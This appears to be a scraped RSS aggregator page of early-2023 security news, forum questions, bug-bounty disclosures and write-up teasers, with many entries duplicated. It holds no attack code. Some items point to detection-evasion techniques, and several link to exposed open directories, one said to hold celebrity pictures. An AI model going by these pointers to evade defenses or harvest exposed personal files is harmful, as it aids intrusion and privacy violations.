    There's been a merger, and I'm trying to address a blind spot with all the new systems and widgets. I'd like to find any/all API services available and confirm they are secured. While I could just dump dns entries and loop through them with /api/ at the end of a curl... i don't feel like that's particularly exhaustive. I have Nessus running, but I haven't found where they have a plugin that really handles this. I did some poking around the open-source world and the search terms are generic enough that i'm not getting great results. submitted by /u/lonejeeper [link] [comments]
    Why do people hide certificate IDs?
    I see people hiding certificate IDs when posting on social media platforms. Is there any solid reason or restrictions or people just following trend blindly. submitted by /u/dauhui [link] [comments]
  • Open

    CVE-2022-43551: Another HSTS bypass via IDN
    Internet Bug Bounty disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1813831 - Bounty: $2400
    Mystery with a leaked token and Reusability of email confirmation link leading to Account Takeover
    Sorare disclosed a bug submitted by gokulsk: https://hackerone.com/reports/1817214 - Bounty: $300
    TikTok 2FA Bypass
    TikTok disclosed a bug submitted by amans: https://hackerone.com/reports/1247108 - Bounty: $1564
  • Open

    阿里云盘崩了
    据多家媒体消息,阿里云盘在2月3日22点30分左右出现故障无法访问。
    《2023 年电力安全监管重点任务》发布,网络安全再次被强调
    《任务》中指出,推进电力行业网络与信息安全工作。
    FreeBuf早报 | 欧洲汽车经销商巨头遭勒索攻击;Twitter API将不再提供免费访问
    Twitter宣布从2月9日开始它的API(包括 v2 和 v1.1)将不再支持免费访问,使用其API将必须付费。
    一种符合工控系统“四高”特性的安全防御体系设计
    持续检测网络安全威胁、准确感知网络安全风险、及时阻断网络攻击活动、完善改进网络防护措施。
    Redis漏洞之殇
    前言这篇同样是之前学习Redis相关漏洞的一些总结,Redis未授权漏洞成因redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等。
    FreeBuf 周报 | 小米汽车供应商泄密被罚100万;2022中国网络安全行业全景册(第五版)发布
    各位 Buffer 周末好,又到了周报时间,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    XSS Game通关教程
    文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
    2023年汽车行业面临的8大网络安全威胁
    说到汽车网络安全威胁,网络攻击者有无数种方法来窃取车辆和驾驶员信息,并导致车辆的功能出现问题。
    CISSP,你值得拥有(我的学习之路)
    分享我cissp的学习经验
    reGeorg+proxychains达到内网横向效果
    reGeorg该工具是基于socks5而且支持的脚本很多,例如aspx|ashx|jsp|jspx|php等等。
    QNAP 软件存在严重漏洞,影响近 30000 台设备
    QTS 5.0.1 和 QuTS hero h5.0.1 两款软件中存在严重漏洞。
    家装巨头安徒生公司被曝泄露客户家庭照片和地址
    建筑和家居装修巨头 Andersen Corporation 暴露了客户的私人数据,包括家庭照片和地址。
    多台Redis服务器中招!警惕来自新型恶意软件HeadCrab的威胁
    自 2021 年 9 月以来,全球至少有 1200 台 Redis 数据库服务器被一个名为 HeadCrab 恶意软件威胁。
  • Open

    SecWiki News 2023-02-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Will Fuzzing Replace SAST?
    In many instances, the answer is becoming “when” not “if.” Continue reading on System Weakness »
    Google’s OSS-Fuzz will add JavaScript — Fuzzing Weekly CW5
    OSS-Fuzz announced to add JavaScript support in 2023: https://security.googleblog.com/2023/02/taking-next-step-oss-fuzz-in-2023.html Continue reading on Medium »
  • Open

    Will Fuzzing Replace SAST?
    In many instances, the answer is becoming “when” not “if.” Continue reading on System Weakness »
    Google’s OSS-Fuzz will add JavaScript — Fuzzing Weekly CW5
    OSS-Fuzz announced to add JavaScript support in 2023: https://security.googleblog.com/2023/02/taking-next-step-oss-fuzz-in-2023.html Continue reading on Medium »
  • Open

    The First Steps on the Zero Trust Journey
    One of the most discussed concepts in the Information Security world in recent history has been Zero Trust. Although many vendors claim to have products for implementing Zero Trust, an organization must not view them as an instant solution to achieving Zero Trust. Zero Trust should be viewed as a philosophy comprised of many controls... The post The First Steps on the Zero Trust Journey appeared first on TrustedSec.
  • Open

    Google’s OSS-Fuzz Adds JavaScript Support in 2023 – Fuzzing Weekly CW5
    Article URL: https://ioc.exchange/@FuzzingWeekly/109800061913485158 Comments URL: https://news.ycombinator.com/item?id=34639120 Points: 1 # Comments: 0
  • Open

    Lots of books, no organization structure,
    submitted by /u/NullVoidPointer [link] [comments]

  • Open

    CORS Vulnerability with Basic Origin Reflection | 2023
    Portswigger’s Cross-Origin Resource Sharing Lab Simple Solution | Karthikeyan Nagaraj Continue reading on Medium »
    SQL injection with filter bypass via XML encoding | 2023
    Portswigger’s SQL Injection Lab Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Why are Bug Bounty programs so popular?
    The rise of cyberattacks has been a significant concern for every organization. In the Data-driven business, organizations in various… Continue reading on Medium »
    IDOR - Inside the Session Storage
    Summary Continue reading on Medium »
    My first Hall Of Fame with a chained Broken Access Control
    This blog is about how I got my first HOF after chaining multiple bugs. Continue reading on InfoSec Write-ups »
    Everything You Need to Know about Cyber Security: A Comprehensive Introduction
    Cybersecurity is the safeguarding against cyber threats of internet-connected systems, including data, software, and hardware. To prevent… Continue reading on Bug Zero »
    What will Developers’ Lives Be Like in 2023 Thanks to AI-Driven Development?
    We software developers are always searching for methods to improve our processes and function more productively. Continue reading on Bug Zero »
    Discovering 5 XSS Vulnerabilities In a Simple Way With Xssor.go
    This write-up is specially made for showing the power of my new tool, It’s called Xssor.go This tool is a XSS payload reflection tester… Continue reading on Medium »
  • Open

    KeePass Devs Downplay Password Theft Vulnerability
    Article URL: https://hothardware.com/news/keepass-devs-downplay-password-theft-vulnerability Comments URL: https://news.ycombinator.com/item?id=34635107 Points: 1 # Comments: 1
  • Open

    Index with a lot of ebooks of all different subjects
    https://213.230.96.51:8090/files/ebooks/ submitted by /u/revwolf [link] [comments]
    Index with a lot of media
    https://itonaku.xyz/ submitted by /u/Isolatedleliel [link] [comments]
    Technical, Graphics, and Polymers.
    Lots and lots and lots of Cyber, Accounting, etc... https://www.kgay4all.com/seioqueseiporleroqueleio/Books/ ​ Graphics program manuals and guides of all kinds. https://lira.epac.to/DOCS-TECH/Graphics/Photoshop/ ​ Polymers. It's all polymers. https://www.eng.uc.edu/~beaucag/Classes/Properties/Books/ submitted by /u/Shitemoji69 [link] [comments]
  • Open

    Wazuh at scale?
    Anyone deploy Wazuh where you needed separate indexer, server, and dashboard servers? I’ve asked in that sub and got no response. Don’t need scale specifics, just high level here are the pieces. It looks to me like I’d need (as an example): 3 indexers 1 server 1 dashboard Load balancer for indexers submitted by /u/Shujolnyc [link] [comments]
    Trellix (exMcAfee) antivirus performance issue
    Users who use Trellix (exMcAfee) Endpoint Protection (ENS), do you have any success story with fixing consuming high CPU? I read the entire McAfee forum, all the guides and troubleshooting, server profiling, whitelists and even just turned off the antivirus on the server, but the CPU is still high +20-50% by McAfee in turn off mode :( I've reinstalled it 10 times already. How did you solve the problems? Also, a question for other users who use other antiviruses, how do you deal with high CPU? Do you often have these problems? submitted by /u/athanielx [link] [comments]
    Tools for "static" log analysis
    I am looking for tools to do "static" log analysis. (Not sure if this is the correct term for it) So I am talking about an air-gapped system where it is not possible to collect the data (log files) over the network. Every couple of months the log files will be collected via USB sticks and combined in one place. Right now the data is fed into ELK and then parsed and analyzed but I was wondering if there are maybe tools which are made to do these kind of analysis. Because from my understanding ELK is not meant to be used like this. Do you have any recommendations? submitted by /u/Ludtwigk [link] [comments]
    What do I need to learn to get into Cyber Security
    Long Story short, was a court reporter and hands gave out. I'm a little discouraged because I'm in my 30s and am wanting to start a new chapter in my life, and I know NOTHING about computers. I'm not even sure how to work Reddit. This is my 2nd post. I'm not even sure I'm in the right spot lol...Anyway, I looked into CS50 (the first lesson) and I loved it. I've always loved math, I've always loved the detail. I don't know, I want to give it a shot. A real shot. What do I need to know to grow in knowledge and really set myself up for success here? School isn't an option anymore. I'm 60k in the hole and paying that baby off. Any Computer Science people out there? Or Cyber Security that would give an advice or two? submitted by /u/No_Conversation5705 [link] [comments]
  • Open

    What this KeePass CVE means for organizations searching for new password vaults
    After the 2022 LastPass breach, many organizations began searching for alternative password vault solutions. KeePass, a legacy open-source option has risen to the top for many organizations evaluating their options. Others have been using this option already for years. A recent POC demonstrating who to abuse the Trigger feature was released and assigned a CVE.... The post What this KeePass CVE means for organizations searching for new password vaults appeared first on TrustedSec.
  • Open

    XSS at jamfpro.shopifycloud.com
    Shopify disclosed a bug submitted by kannthu: https://hackerone.com/reports/1444682 - Bounty: $9400
  • Open

    Discovering Six Critical Docker Desktop Privilege Escalation Vulnerabilities. (Bonus: New OSS Tool!)
    submitted by /u/jat0369 [link] [comments]
    GitHub - adityatelange/bhhb: Tool to view HTTP history exported from Burp Suite Community Edition
    submitted by /u/adityatelange [link] [comments]
    The missing piece: the need for product management in security teams
    submitted by /u/sullivanmatt [link] [comments]
    EMBA - Automated firmware security scanner v1.2.1 released
    submitted by /u/_m-1-k-3_ [link] [comments]
    An easy way to preview the content of an XML nmap file, in VS Code.
    submitted by /u/j_bono [link] [comments]
    Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit - CVE-2023-21608
    submitted by /u/hacksysteam [link] [comments]
    Demystifiying SMPC (Secure multi-party computation) and its threat model
    submitted by /u/hardenedvault [link] [comments]
    Unserializable, but unreachable: Remote Code Execution on vBulletin
    submitted by /u/cfambionics [link] [comments]
  • Open

    Chocolate Factory TryHackMe Writeup | By Xploit Ayush
    No content preview
    Cyborg TryHackMe Writeup | By Xploit Ayush
    No content preview
    Threat Detection
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    PhotoBomb Hack the box Walkthrough — [HTB]
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 2
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 1
    No content preview
    My first Hall Of Fame with a chained Broken Access Control
    No content preview
  • Open

    Chocolate Factory TryHackMe Writeup | By Xploit Ayush
    No content preview
    Cyborg TryHackMe Writeup | By Xploit Ayush
    No content preview
    Threat Detection
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    PhotoBomb Hack the box Walkthrough — [HTB]
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 2
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 1
    No content preview
    My first Hall Of Fame with a chained Broken Access Control
    No content preview
  • Open

    Chocolate Factory TryHackMe Writeup | By Xploit Ayush
    No content preview
    Cyborg TryHackMe Writeup | By Xploit Ayush
    No content preview
    Threat Detection
    No content preview
    High Level Analysis of Custom Browsers
    No content preview
    PhotoBomb Hack the box Walkthrough — [HTB]
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 2
    No content preview
    Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 1
    No content preview
    My first Hall Of Fame with a chained Broken Access Control
    No content preview
  • Open

    SecWiki News 2023-02-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Gmail Analiser
    Hello all, i am wondering if there is any software to analise gmail acounts, like logins, Accesses, points of logins, in freeware/opensource? Thank you submitted by /u/hpbalmeida [link] [comments]
    Recon Lab by Sumuri
    Anyone ever used it before if so how was it. Also it works on only works on Mac is con or pro for consumer and forensic experts ? submitted by /u/Jack_gg123 [link] [comments]
    Forensic Workstation Pre-Builts
    Hi All, Curious about what everyone has been using or would consider to use for a portable forensic workstation. I am well aware the meta are gaming laptops. Our practice is a small team and we're undergoing an equipment refresh. We have Alienwares and Dells currently, but I would like to get an idea of what everyone else seems to be using, my team leader is open to suggestions. We're a Cellebrite and Axiom shop; my understanding in basic terms is Cellebrite is bound by RAM and Axiom bound by CPU for parsing images. Any noticeable difference with modern (meaning 1-2 year old) Intel vs AMD CPUs? Also open to suggestions for smaller laptops that may hit a sweet spot in terms of performance comparable to a gaming machine- our practice sometimes delivers devices to clients for remote collections. submitted by /u/greengobblin911 [link] [comments]
    OpenSource X-Ways X-Tension: VirusTotal Plugin
    submitted by /u/Alarming_Arm_7724 [link] [comments]
  • Open

    Enumerating AD in an OPSEC safe way
    In this week's red team tip. I show a way to enumerate AD in an OPSEC-safe way with Layer8Security's SilentHound. This tool uses a single LDAP query to list AD and caches the results locally. It's not nearly as loud or as well fingerprinted as SharpHound/AzureHound. Plus, you can convert the local cache to JSON and use jq or other tools to query the cached data. https://youtu.be/MRLZO17ZrmA submitted by /u/Infosecsamurai [link] [comments]
  • Open

    I’m Red Team — My Methodology & Tools
    It may seem counterintuitive to pay someone to tell you your shortcomings, but smart companies today are shelling out dollars and… Continue reading on Medium »
  • Open

    如何应对应急响应审计;WebShell检测与控制思路 | FB甲方群话题讨论
    应对监管部门审计,如何提供安全事件应急响应管理制度的落实情况;WebShell的检测思路及控制措施的探讨,更多内容欢迎点击~
    FreeBuf早报 | 川渝公布16款侵害用户权益App名单;亲俄组织Killnet袭击欧洲医院
    2022 年,黑客在加密货币领域窃取了创纪录的38亿美元资金。
    小米汽车“设计文件”泄密,供应商被罚100万元!
    依照《保密协议》处以100万元的经济赔偿,责成其对下游供应商加强信息安全管理,并对泄密人进行处理。
    IOS逆向--恢复Dyld的内存加载方式
    之前我们一直在使用由dyld及其NS Create Object File Image From Memory / NS Link Module API方法所提供的Mach-O捆绑包的内存加载方式。
    超过 1800 种的 Android 网络钓鱼形式,以极低的价格在暗网出售
    针对移动银行的凭据收集网络注入与加密货币应用程序一起在暗网上出售。
    LockBit纳新,开始使用基于Conti的加密器
    新型加密器被称为LockBit Green,通过对样本进行逆向工程,发现它100% 基于 Conti泄露的源代码。
    2022年第四季度企业邮箱安全态势观察
    国家互联网应急中心重磅发布Coremail企业邮箱Q4季报,钓鱼邮件高达6666万,环比上升 48.12%,谨防黑产假冒国家部门发送【人才/劳务/疫情补贴】主题钓鱼诈骗!
  • Open

    实战场景中 Cobalstrike 的二次开发
    作者:雪诺凛冬实验室 gd 原文链接:https://mp.weixin.qq.com/s/R1BoWivtTxo0zFk4nyBFTw 前言 随着近几年HW实战的开展所有人都对Cobalstrike不再陌生,相关安防设备一直在思考如何在流量侧/终端侧识别出CS的行踪。攻击者除了使用习惯上基于插件进行开发提效外,还有一些需要关注对抗的点来提升CS的隐藏性,我们会分两篇文章将CS在流量层面、内...
  • Open

    实战场景中 Cobalstrike 的二次开发
    作者:雪诺凛冬实验室 gd 原文链接:https://mp.weixin.qq.com/s/R1BoWivtTxo0zFk4nyBFTw 前言 随着近几年HW实战的开展所有人都对Cobalstrike不再陌生,相关安防设备一直在思考如何在流量侧/终端侧识别出CS的行踪。攻击者除了使用习惯上基于插件进行开发提效外,还有一些需要关注对抗的点来提升CS的隐藏性,我们会分两篇文章将CS在流量层面、内...
  • Open

    Russians are Starting to Think
    In the west, the practice of open-source intelligence is the norm. While particular weapon systems are seen as almost magical for the war… Continue reading on Medium »

  • Open

    Input Validation Issues
    POV you login into a site on a work computer using your credentials however after putting yours in you login into whoever was last using the computer. What are your thoughts/theories on how this could happen? submitted by /u/EstrogenGirl [link] [comments]
    Google Voice number for higher account security?
    I've been reflecting on the growing number of data breaches, sim swap attacks, and other factors that have resulted in identity theft. I wanted to run a thought by this subreddit to get opinions on something I'm thinking of doing to provide some of my accounts with a higher level of protection. ​ I have a Google account that has their Advanced Protection Program enabled - two physical security keys as MFA. That account also has an active Google Voice number that I've sat on and done practically nothing with for several years. That GV phone number receives 1 or 2 calls/texts a year and they're always from people who knew the owner of that number some years ago. So, the number is more or less unknown and not out there in any data breaches AFAIK. ​ My idea is to use this Google Voice number for several accounts that don't offer the ability to use a physical security key for MFA. As I understand it, because your GV number is tied to your Google account and therefore can't be accessed by anyone without your credentials and MFA (which in this case would require physical access to as well as knowledge of where both of my physical keys are), and it can't be sim swapped because there's no sim to swap, this seems like the best, most secure bet for maintaining account security for online accounts that have only SMS 2FA as an option. ​ Any holes that you can poke in the idea? Are there better methods when physical key security isn't available? submitted by /u/Aggravating_Bell3162 [link] [comments]
    Resources to learn Incident Response for someone relatively new to Cybersecurity
    I'm a sophomore computer science major that has an upcoming interview with Meta for a Privacy Engineering role. One of the rounds for the interview is an incident response scenario interview. Here are the instructions: "During this interview we will ask you to run an investigation of a suspicious alert. You will need to determine whether this is an incident or not and demonstrate your understanding of the root cause, mitigation and remediation". What resources could I look into to best prepare for the interview? Would a Security+ textbook be enough to get a good grasp of Incident Response? I'm relatively new to cybersecurity, and any beginner friendly resources would be greatly appreciated. Thanks. submitted by /u/NoFaithlessness6885 [link] [comments]
    Exabeam Query Language Assistance
    Howdy! Longtime lurker, first time poster. I'm a threat hunter, and I just got assigned a new client that utilizes Exabeam. Do any of y'all have experience with the query language used by Exabeam? I'm somewhat coming up blank even from Exabeam's own documentation. Most of their training videos seem centered around working through AA (Advanced Analytics), but I'm trying to produce actual queries in DL (Data Lake) and not pick through a bunch of screens in AA. Thanks! submitted by /u/cosmic_gr4zer [link] [comments]
    Blue team tips and help ?
    What are some tips and suggestions for a blue team trying to defend against red team attackers in a competition . Realistically we want to keep the uptime as long as possible but honestly I’d like to know what others suggest to help submitted by /u/RevPurge [link] [comments]
    PasswordSafe & KeePass database stored on cloud storage (OneDrive,Gdrive,DropBox)
    This is a common method of creating your own, free, multiplatform Password Manager. ​ Simply store the DB on a cloud storage provider and use a manager plus a fork on your phone, since the manager doesn't work on it's own. For example: ​ This - https://play.google.com/store/apps/details?id=com.jefftharris.passwdsafe With this - https://play.google.com/store/apps/details?id=com.jefftharris.passwdsafe.sync ​ My question is, is this system considered wise in terms of security? Are these DBs encrypted? submitted by /u/trekinstein [link] [comments]
    Believe we have been hit with someone with CrackMapExec...help?
    Obligatory SIHTF moment here. Have already started the process of what I think is prudent.. what would you guys do first? The part that tipped this off was a folder called "ptest" showing up on one users desktop computer. No other machines in the environment appear to have this folder. The other reason this machine is under the microscope (and currently turned off, although ptest was created nov 3rd) is because a user walked in to find another users name on the login screen, it does not appear that the login actually occurred. At the moment it appears the person was trying to get in and either did not have the exact correct password or was interrupted. The specific user that they are trying to target is not very computer literate and had an easy password something comparable to 'reddog12' - this has been changed on a different computer. Most concerned about access to 2 different servers. Thank you for any suggestions. submitted by /u/Blazah [link] [comments]
    bitwarden vs 1password vs lastpass vs ...
    Hello, I have been trying to get a password manager, but after reading lots of stuff, I'm more confused than before... My use case is simple: store and manage password for websites if a website allows me to use yubikey 5C NFC, I will add that as MFA. usage on windows, macos, Linux and Android Should I add to the masterpassword the Yubikey? Which one do you use? What would you recommend? submitted by /u/IP_FiNaR [link] [comments]
    Industry metrics
    Any ideas on where I can find industry numbers for security metrics? for example, training awareness completion, phishing simulation, etc. i’m trying to baseline our goals submitted by /u/evilmanbot [link] [comments]
    Any tips on efficiently evaluating a huge list of subdomains for a PenTest?
    I've been tinkering around and trying to solidify my recon phase of things. I'm pretty new and have been liking the results from amass, SubDomainzer, and subscraper. I'm sure there are more tools out there but this will generally give me hundreds sometimes a thousand or so subdomains to work with. I plan on making a custom script that will read the files produced by all the different tools to make a master file of subdomains that do not repeat the same one (tools are going to spitting out repeats of other tools). Once I have a huge subdomain file list, what's the most efficient way to work the subdomains moving into port reconnaissance? Ive used some online tools that allow you to paste subdomains and it'll give you the IP. But I also know that in Kali Linux you can use nslookup to get ips. I'm thinking about writing a custom script that will nslookup command down the master list of subdomains and print it out into a master ip list document neatly one row at a time. I'm assuming the efficiency goal is to do the following: Subdomains> ips > port scans > vulnerability assessment phase Does anyone have any tips of the trade or the best tool or method once you have that huge file of unique subdomains? submitted by /u/Speen117 [link] [comments]
  • Open

    Ronin 2.0.0 has finally been released! Ronin is a free and Open Source Ruby toolkit for security research and development.
    submitted by /u/postmodern [link] [comments]
    HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign
    submitted by /u/gfdgfbal [link] [comments]
    Precision Munitions for Denial of Service
    submitted by /u/DevSec23 [link] [comments]
    CVE-2021-34462: Exploiting the Windows AppXSvc Service Logic-Error Vulnerability
    submitted by /u/Gallus [link] [comments]
    RCE in Avaya Aura Device Services
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Protegendo suas informações sensíveis na web: Como entender e prevenir o Cross-Site Scripting (XSS)
    Cross-Site Scripting (XSS) é uma das vulnerabilidades de segurança mais comuns na web. É uma técnica que permite a injeção de scripts… Continue reading on Medium »
    Understanding and Preventing CSRF AttackAbout CSRF
    A Comprehensive Guide to Identifying, Mitigating and Protecting Your Website from Cross-Site Request Forgery Continue reading on InfoSec Write-ups »
    What is in the Strings.xml!!
    In the Android, application it is a package called apk(android package kit), it is similar to a zip-like format to extract the data from… Continue reading on Medium »
    Techniques to discover subdomains
    Before taking any action on any bug bounty program it is necessary to carefully read the rules of the program. Continue reading on Medium »
    Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)
    # Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnreability. # Date: 25–01–2023 # Exploit Author: Venkata Siva Kumar… Continue reading on Medium »
    Account Takeover Guide
    Hey guys, in this tutorial, I will be sharing my learning about account takeover which I have learned after reading some blogs only on… Continue reading on InfoSec Write-ups »
    What is Ethereum? Mastering Ethereum for smart contract security
    What is Ethereum Everything you need to know? Continue reading on Medium »
    Don’t Give Up On XSS! | Fun Firefox XSS
    There’s always a way to exploit xss in different contexts Continue reading on InfoSec Write-ups »
    Privilege Escalation Lead to Data Breach
    Assalamualaikum, Bug Hunter! Bagaimana Kabarnya ? Semoga Baik-baik saja ya, kali ini saya mau membuat Write Up yang menurut saya Bug ini… Continue reading on Medium »
    OSINT analysis — SpiderFoot & theharvester (Information Gathering)
    What is OSINT? Continue reading on Medium »
  • Open

    Enhancing OSINT Collection using RSS Feeds
    RSS (Really Simple Syndication) is a technology that allows users to subscribe to frequently updated content on the internet, such as blog… Continue reading on Medium »
    Hacktoria — Operation Manhunt
    I joined late, on 5th or 6th January when all of the tweets had already been posted. Players were asked to identify country, city, street… Continue reading on Medium »
    Are you looking for information about a person, company, or organization?
    I am here to help you uncover hidden information using advanced Open-Source Intelligence (OSINT) techniques. Continue reading on Medium »
    OPERATION: MANHUNT WRITEUP
    January 1, 2023 Continue reading on The Sleuth Sheet »
    SPYrt speakers…
    Smart speakers have learned to listen to suspicious noise in the house, however, not all users were happy with the new option, writes… Continue reading on Medium »
  • Open

    Exploring FTP Vulnerabilities through Hands-On Testing in a Virtual Lab Environment
    File Transfer Protocol (FTP) and its security implications. This post offers an in-depth look at the usage of FTP for file transfers Continue reading on InfoSec Write-ups »
    Detecting & Bypassing Defensive Measures (Canary Token)
    In the last part, we talk about how to track the hacker’s activities on our network using a canary token. Continue reading on System Weakness »
    Detecting & Bypassing Defensive Measures (Canary Token)
    In the last part, we talk about how to track the hacker’s activities on our network using a canary token. Continue reading on Medium »
    Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) — [CWE-22]
    — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — Continue reading on Medium »
  • Open

    Absolute massive open directory with celebrity pictures
    submitted by /u/degamezolder [link] [comments]
  • Open

    Another Password Manager Leak Bug: But KeePass Denies CVE
    Article URL: https://jpayne.sackheads.blog/2023/01/31/another-password-manager.html Comments URL: https://news.ycombinator.com/item?id=34614678 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-01 Review
    九阶段太空攻击研究与战术分析框架和七层美国防太空架构 by ourren 2022年度APT高级威胁报告 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-01 Review
    九阶段太空攻击研究与战术分析框架和七层美国防太空架构 by ourren 2022年度APT高级威胁报告 by ourren 更多最新文章,请访问SecWiki
  • Open

    我认识的那些网安客户
    这些年,和各种类型的网安客户打过交道,有些事想起来还挺有意思。
    解密 CryptBot 窃密软件
    CryptBot 是一种针对 Windows 操作系统进行信息窃取的恶意软件,在 2019 年被首次发现,旨在窃取失陷主机的敏感信息。
    2022年全球邮件威胁报告-网际思安
    我们全新整理了2022年网际思安麦赛安全实验室(MailSec Lab)在邮件安全威胁领域的数据分析成果,及观察到的全球前沿信息和数据。
    SCA技术进阶系列(一):SBOM应用实践初探
    SBOM作为软件供应链安全治理的重要抓手,其在行业的应用实践速度明显加快。
    深度干货 | 感染型勒索软件 Azov 分析报告
    Azov 勒索软件家族最早出现在2022年10月中旬,是一款感染型勒索病毒。
    FreeBuf早报 | 马斯克被施压以符合欧盟数字新规;TikTok CEO将出席美国国会听证会
    TikTok首席执行官周受资已同意参加在美国国会举行的听证会,时间定于3月23日。
    汽车CAN总线渗透测试
    CAN网络不是一个封闭的内部网络,可直接通过车内的OBD诊断接口接入CAN总线,也可通过智能手机、云服务器等与T-Box建立连接间接接入CAN总线,这样就给不法者入侵CAN网络提供了可乘之机。
    通过 Realtek SDK 漏洞攻击一窥 IoT 供应链威胁
    通过 CVE-2021-35394 的在野攻击情况可以看出,攻击者对供应链漏洞非常感兴趣,物联网中的供应链安全更应该引起注意。
    CCSIP2022中国网络安全行业全景册(第五版)正式发布
    FreeBuf咨询正式发布 《CCSIP(China Cyber Security Industry Panorama)2022 中国网络安全行业全景册(第五版)》。
    格式化字符串漏洞分析
    对格式化字符串漏洞利用过程进行分析。
    立即修改密码,KeePass 曝严重漏洞,密码数据库被明文导出
    KeePass 官方发布声明表示,CVE-2023-24055 漏洞不应该归咎于 KeePass,并且这一漏洞不是其所能够解决的。
    基于机器学习的汽车CAN总线异常检测方法
    机器学习作为车载网络入侵检测中至关重要的一项技术,可实现对已知/未知攻击行为的特征识别检测。
    Google Fi 遭到破坏,客户数据遭重大泄露
    Google Fi 表示,客户数据已被黑客泄露,这起事件很可能与 1 月 19 日发生的大规模 T-Mobile 黑客攻击有关。
    微软:100多名攻击者使用了超50种勒索软件
    微软安全团队追踪到100 多个在攻击期间部署勒索软件的攻击者,总共监控到50多个被频繁使用的勒索软件系列。
    DVWA平台搭建+SQL注入实验详解
    实现DVWA平台的搭建;进行SQL注入的练习,了解因web应用程序对用户输入数据的合法性没有判断或过滤不严而造成的危害。
    NTLM协议初探
    NTLM协议具有NTLM v1、NTLM v2两个版本,但是目前使用最多的是NTLM v2。
  • Open

    How Threat Actors Use OneNote to Deploy ASyncRAT
    See how Research Team Lead Carlos Perez dissects a sample of a OneNote document that was used to deploy ASyncRAT, an open-source remote admin tool, to enable phishing attacks. You’ll find out how these OneNote files are now being used by threat actors and where to find the location that ASyncRAT is being downloaded and... The post How Threat Actors Use OneNote to Deploy ASyncRAT appeared first on TrustedSec.
  • Open

    EnCase Report show Hex value
    I booked marked a hex value but the text is showing in the Report. The text isn't the helpful part, is there a way to show Hex value instead? Also, I vaguely recall years ago being able to show the "Report" section in the report. You know the report tab when viewing a file, i remember being able to select that as an option to show. I can't seem to find it anymore. Is that no longer possible? submitted by /u/dardack [link] [comments]
  • Open

    Account Takeover Guide
    No content preview
    The Importance of Backing Up Your Data for ICS Security
    No content preview
    All About Attacking JWT
    No content preview
    Phishing Scams Exposed: The Tricks Hackers Use and How to Defend Yourself
    A Comprehensive Guide to Understanding and Defending Against Phishing Scams Continue reading on InfoSec Write-ups »
    The Impact of Artificial Intelligence on Exploit Development
    No content preview
    Increasing Website Security
    I will be going over things you can add to your company's code base to increase the security of your app. Continue reading on InfoSec Write-ups »
    Don’t Give Up On XSS! | Fun Firefox XSS
    No content preview
    GOOGLE CHROME’S BIGGEST BLUNDER:
    No content preview
    Online Income Generation: Balancing Opportunities and Risks in Cybersecurity
    Maximizing Earnings While Protecting Your Online Safety: A Guide to Online Income Generation and Cybersecurity Continue reading on InfoSec Write-ups »
    “Zero-Day Exploits: The Dark Side of Technology to your business”
    No content preview
  • Open

    Account Takeover Guide
    No content preview
    The Importance of Backing Up Your Data for ICS Security
    No content preview
    All About Attacking JWT
    No content preview
    Phishing Scams Exposed: The Tricks Hackers Use and How to Defend Yourself
    A Comprehensive Guide to Understanding and Defending Against Phishing Scams Continue reading on InfoSec Write-ups »
    The Impact of Artificial Intelligence on Exploit Development
    No content preview
    Increasing Website Security
    I will be going over things you can add to your company's code base to increase the security of your app. Continue reading on InfoSec Write-ups »
    Don’t Give Up On XSS! | Fun Firefox XSS
    No content preview
    GOOGLE CHROME’S BIGGEST BLUNDER:
    No content preview
    Online Income Generation: Balancing Opportunities and Risks in Cybersecurity
    Maximizing Earnings While Protecting Your Online Safety: A Guide to Online Income Generation and Cybersecurity Continue reading on InfoSec Write-ups »
    “Zero-Day Exploits: The Dark Side of Technology to your business”
    No content preview
  • Open

    Account Takeover Guide
    No content preview
    The Importance of Backing Up Your Data for ICS Security
    No content preview
    All About Attacking JWT
    No content preview
    Phishing Scams Exposed: The Tricks Hackers Use and How to Defend Yourself
    A Comprehensive Guide to Understanding and Defending Against Phishing Scams Continue reading on InfoSec Write-ups »
    The Impact of Artificial Intelligence on Exploit Development
    No content preview
    Increasing Website Security
    I will be going over things you can add to your company's code base to increase the security of your app. Continue reading on InfoSec Write-ups »
    Don’t Give Up On XSS! | Fun Firefox XSS
    No content preview
    GOOGLE CHROME’S BIGGEST BLUNDER:
    No content preview
    Online Income Generation: Balancing Opportunities and Risks in Cybersecurity
    Maximizing Earnings While Protecting Your Online Safety: A Guide to Online Income Generation and Cybersecurity Continue reading on InfoSec Write-ups »
    “Zero-Day Exploits: The Dark Side of Technology to your business”
    No content preview
  • Open

    Bypass Windows Defender,
    Researchers S2W used Jackalope fuzzer to exploit CVE-2022–24548 in Windows Defender and bypass its security controls. Continue reading on Medium »
  • Open

    Bypass Windows Defender,
